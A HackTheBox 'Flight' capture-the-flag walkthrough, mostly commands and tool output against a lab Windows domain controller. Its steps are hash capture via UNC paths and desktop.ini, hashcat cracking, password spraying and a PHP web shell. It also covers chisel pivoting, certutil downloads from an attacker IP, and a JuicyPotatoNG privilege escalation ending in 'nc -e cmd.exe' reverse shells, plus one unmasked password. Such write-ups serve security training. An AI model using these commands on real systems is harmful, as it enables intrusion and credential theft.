# [HackTheBox] Flight
![](https://i.imgur.com/vXpBdHO.png)
## Foothold
Checking ports is open in this target
```bash
#$ nmap -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49697/tcp open unknown
49709/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds
```
Checking the Subdomains and Subfolders:
```bash
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://flight.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000624: 200 90 L 412 W 3996 Ch "school"
```
After get the subdomain is `School`, we continue to enum the URL.
```bash
dirsearch -u http://school.flight.htb
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt
Target: http://school.flight.htb/
```
But i notice this envidence:
![](https://i.imgur.com/xkfcrqB.png)
It's maybe LFI vulnerability in this URL so we check it with `../../../../etc/passwd` and got the result.
![](https://i.imgur.com/970WrHI.png)
So we will check the sourcecode to make sure how the filter work right
```bash
<?php
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if(isset($_GET['view'])){
$file=$_GET['view'];
if ((strpos(urldecode($_GET['view']),'..')!==false)||
(strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
(strpos(urldecode($_GET['view']),'\\')!==false)||
(strpos(urldecode($_GET['view']),'htaccess')!==false)||
(strpos(urldecode($_GET['view']),'.shtml')!==false)
){
echo "<h1>Suspicious Activity Blocked!";
echo "<h3>Incident will be reported</h3>\r\n";
}else{
echo file_get_contents($_GET['view']);
}
}else{
echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?>
```
Humh it's maybe so hard to try to bypass this filter for exploiting this vul. => The url validation part prevents us from doing LFI. But we can use this code to force the service to fetch a remote source using Windows network share syntax: //ip>/<share> and attempt to capture the hash of a service.
```bash
#Website:
http://school.flight.htb/index.php?view=//ip-attack/test
#Attacker's machine:
responder -I tun0 -wPv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Responder IPv6 [dead:beef:4::100b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-UJ4VMU7XFG1]
Responder Domain Name [R924.LOCAL]
Responder DCE-RPC Port [47241]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:90b54e5073440f91:DACEA051848BC07064B8F1F6CF6ECAFD:0101000000000000003EECF9970ED90152190EB7403C9CC30000000002000800520039003200340001001E00570049004E002D0055004A00340056004D0055003700580046004700310004003400570049004E002D0055004A00340056004D005500370058004600470031002E0052003900320034002E004C004F00430041004C000300140052003900320034002E004C004F00430041004C000500140052003900320034002E004C004F00430041004C0007000800003EECF9970ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000
```
Crack this hash with hashcat and get the result:
```bash
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show
SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935:010100000000000080c8475ed80dd901b5e12e7f671312270000000002000800590048003900320001001e00570049004e002d0030005200590058005800350031005800460041004b0004003400570049004e002d0030005200590058005800350031005800460041004b002e0059004800390032002e004c004f00430041004c000300140059004800390032002e004c004f00430041004c000500140059004800390032002e004c004f00430041004c000700080080c8475ed80dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:S*******13
```
## Enum the SMB services:
After get the creds `svc_apache`, we will check the folders in SMB service
```bash
smbclient -L //flight.htb/ -U svc_apache
Password for [WORKGROUP\svc_apache]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shared Disk
SYSVOL Disk Logon server share
Users Disk
Web Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
## AD Enum:
Perform enum on SMB using the previously obtained credential
```bash
> ~/tools/cme/cme OR crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users
SMB flight.htb 445 G0 flight.htb\O.Possum badpwdcount: 0 desc: Helpdesk
SMB flight.htb 445 G0 flight.htb\svc_apache badpwdcount: 0 desc: Service Apache web
SMB flight.htb 445 G0 flight.htb\V.Stevens badpwdcount: 0 desc: Secretary
SMB flight.htb 445 G0 flight.htb\D.Truff badpwdcount: 0 desc: Project Manager
SMB flight.htb 445 G0 flight.htb\I.Francis badpwdcount: 0 desc: Nobody knows why he's here
SMB flight.htb 445 G0 flight.htb\W.Walker badpwdcount: 0 desc: Payroll officer
SMB flight.htb 445 G0 flight.htb\C.Bum badpwdcount: 1 desc: Senior Web Developer
SMB flight.htb 445 G0 flight.htb\M.Gold badpwdcount: 0 desc: Sysadmin
SMB flight.htb 445 G0 flight.htb\L.Kein badpwdcount: 0 desc: Penetration tester
SMB flight.htb 445 G0 flight.htb\G.Lors badpwdcount: 0 desc: Sales manager
SMB flight.htb 445 G0 flight.htb\R.Cold badpwdcount: 0 desc: HR Assistant
SMB flight.htb 445 G0 flight.htb\S.Moon badpwdcount: 0 desc: Junion Web Developer
```
Using a similar approach, we learnt that another user `s.moon` is using the same password as `svc_apache`
```bash
> ~/tools/cme/cme OR crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success
SMB flight.htb 445 G0 [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\svc_apache:S*********3
SMB flight.htb 445 G0 [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\S.Moon:S*********3
```
## User: C.bum
Using impacket-smbexec, we can find out which share is writable. But there seems to be customised code that prevents a lot of file types to be written: `Shared`
```bash
impacket-psexec flight.htb/s.moon@g0.flight.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on g0.flight.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file uCHgwuyI.exe
[-] Error uploading file uCHgwuyI.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
```
I realize the `Shared` folder can upload and modify item => So i refer this post https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini
```bash
[.ShellClassInfo]
IconResource=\\<ip>\test
```
After creating the file `desktop.ini`, we put it in the smb folder `Shared`:
```bash
smbclient //flight.htb/shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini
With Attacker's machine:
responder -I tun0 -wPv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Responder IPv6 [dead:beef:4::100b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-W7Y6MWYR8I8]
Responder Domain Name [K8PD.LOCAL]
Responder DCE-RPC Port [46715]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:c69dd0be9d4ce77f:00496C1DA43547AFEB8ED388C9C0DA2D:010100000000000000C6E5869D0ED901BE5A960CC06FDB0D00000000020008004B0038005000440001001E00570049004E002D0057003700590036004D0057005900520038004900380004003400570049004E002D0057003700590036004D005700590052003800490038002E004B003800500044002E004C004F00430041004C00030014004B003800500044002E004C004F00430041004C00050014004B003800500044002E004C004F00430041004C000700080000C6E5869D0ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000
```
After that we use hashcat to crack c.bum password:
```bash
hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show
C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6:010100000000000080375566db0dd9010a4e5110dfd2119000000000020008004e0042004200380001001e00570049004e002d0042005400540039004a0050005a004a0042003700550004003400570049004e002d0042005400540039004a0050005a004a004200370055002e004e004200420038002e004c004f00430041004c00030014004e004200420038002e004c004f00430041004c00050014004e004200420038002e004c004f00430041004c000700080080375566db0dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:T*************4
```
After get this cred, we can login into the `Web` folder with smb service.
```bash
smbclient //flight.htb/Web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
```
Then i put the p0wny-shell into the `flight.htb`: https://github.com/flozz/p0wny-shell
```bash
smb: \> ls
. D 0 Tue Dec 13 09:57:01 2022
.. D 0 Tue Dec 13 09:57:01 2022
flight.htb D 0 Tue Dec 13 09:57:01 2022
school.flight.htb D 0 Tue Dec 13 09:57:01 2022
5056511 blocks of size 4096. 1250756 blocks available
smb: \> cd flight.htb
smb: \flight.htb\> put web_shell.php test.php
putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s)
smb: \flight.htb\>
```
Then go to the web_shell and get the connect session with revshells.com
![](https://i.imgur.com/zUBnbtC.png)
## C.bum Session:
We got the cred of c.bum so we need to change the session connect to c.bum with `RunasCS` : https://github.com/antonioCoco/RunasCs/tree/master
```bash
PS C:\Users\svc_apache\Desktop> .\test.exe c.bum Tikkycoll_431012284 powershell -r 10.10.16.13:9003
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.
```
After that we can type the `user.txt` file
## P.E
After get the shell with `svc_apache` user, i will check port which is opening to serve the specified service and i got the `8000`. So i pivot it with chisel to interact to it with attacker's machine:
```bash
PS C:\xampp\htdocs\flight.htb> netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
```
Pivoting Network with Chisel:
```bash
#Client:
.\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000
#Server:
chisel server --reverse -p 9999
```
After i got the connect with website, i realize the website is written by ASP .NET => i can try to upload the `.aspx` shell to reverse this sesssion
```bash
Because the shell maybe remove very quick so we need to upload it to somewhere and we just copy it maybe it's necessary.
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\
```
We can get the reverse shell with `iis apppool\defaultapppool`
![](https://i.imgur.com/KLasfgL.png)
## Administrator
Enum:
```bash
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
After refering this post https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens. I decide to choose Potatojuice to Priv this machine https://github.com/antonioCoco/JuicyPotatoNG
```bash
i will upload 2 things into c:\users\c.bum\desktop
>certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe
>certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe
After that we grant permission 2 files for everyone
>icacls nc.exe /grant Users:F
>icacls test.exe /grant Users:F
```
We go to the `iis/appool` session to get the root
```bash
c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe"
```
Result:
![](https://i.imgur.com/J5ErEZ6.png)